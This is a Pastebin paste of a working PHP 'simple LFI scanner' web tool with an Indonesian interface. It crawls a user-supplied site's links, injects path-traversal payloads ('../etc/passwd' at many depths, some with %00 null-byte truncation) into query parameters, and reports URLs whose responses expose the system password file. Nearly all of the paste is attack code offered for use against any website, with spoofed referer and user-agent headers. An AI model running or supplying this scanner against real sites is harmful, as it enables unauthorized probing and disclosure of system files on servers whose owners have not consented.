Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head> <title>+- simple LFI scanner -+</title>
- <body>
- <center><h1>simple LFI scanner</h1>
- <form method='post'>
- source : http://github.com/fakhrizulkifli/Website-Vulnerability-Scanner-v1.0/ <br>
- masukan alamat website : </br></br>
- <input type='text' size='23' name='site' value='' placeholder='contoh http://google.com/'><br>
- <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
- </form>
- <?php
- function Get_Info($site) {
- if($info = con_host($site)) {
- preg_match("/Content-Type:(.+)/", $info, $type);
- preg_match("/Server:(.+)/", $info, $server);
- print "[-] $type[0]<br>";
- print "[-] $server[0]<br>";
- $ip = parse_url($site);
- print "[-] IP: ".gethostbyname($ip['host'])."<br>";
- }
- }
- function con_host($host) {
- $ch = curl_init($host);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_TIMEOUT, 200);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
- $pg = curl_exec($ch);
- if($pg){
- return $pg;
- } else {
- return false;
- }
- }
- function find_link($site) {
- if($text = con_host($site)) {
- $find = "/href=[\"']?([^\"']+)?[\"']?/i";
- preg_match_all($find, $text, $links);
- foreach($links[1] as $link) {
- $a[] = $link;
- }
- return $a;
- }
- }
- function lfi($site) {
- $list_lfi = array(
- '../etc/passwd',
- '../../etc/passwd',
- '../../../etc/passwd',
- '../../../../etc/passwd',
- '../../../../../etc/passwd',
- '../../../../../../etc/passwd',
- '../../../../../../../etc/passwd',
- '../../../../../../../../etc/passwd',
- '../../../../../../../../../etc/passwd',
- '../etc/passwd%00',
- '../../etc/passwd%00',
- '../../../etc/passwd%00',
- '../../../../etc/passwd%00',
- '../../../../../etc/passwd%00',
- '../../../../../../etc/passwd%00',
- '../../../../../../../etc/passwd%00',
- '../../../../../../../../etc/passwd%00',
- '../../../../../../../../../etc/passwd%00',
- );
- $request = parse_url($site);
- print "[-] URL : $request[host]<br>";
- print "[-] Path: $request[path]<br>";
- print "[-] Try connect to host<br>";
- $url = "".$request['scheme']."://".$request['host'].$request['path']."";
- if(con_host($url))
- {
- print "[+] Connect to host successful<br>";
- print Get_Info($url);
- print "[-] Finding link on the website<br>";
- print "[+] Found link : ".count(find_link($url))."<br>";
- print "[-] Finding vulnerable...<br>";
- if(is_array(find_link($url)))
- foreach(find_link($url) as $link) {
- $file = explode("/", $request['path']);
- $request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
- if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
- foreach($list_lfi as $error) {
- $link = preg_replace("/=(.+)/", "=$error", $link);
- if(preg_match("/root:x:/", con_host($link))) {
- print "[-]LFI vulnerable : $link<br>";
- $save[] = $link;
- }
- }
- }
- print "[-] Done<br>";
- }
- }
- $site=$_POST['site'];
- lfi($site);
- ?>
- </center>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement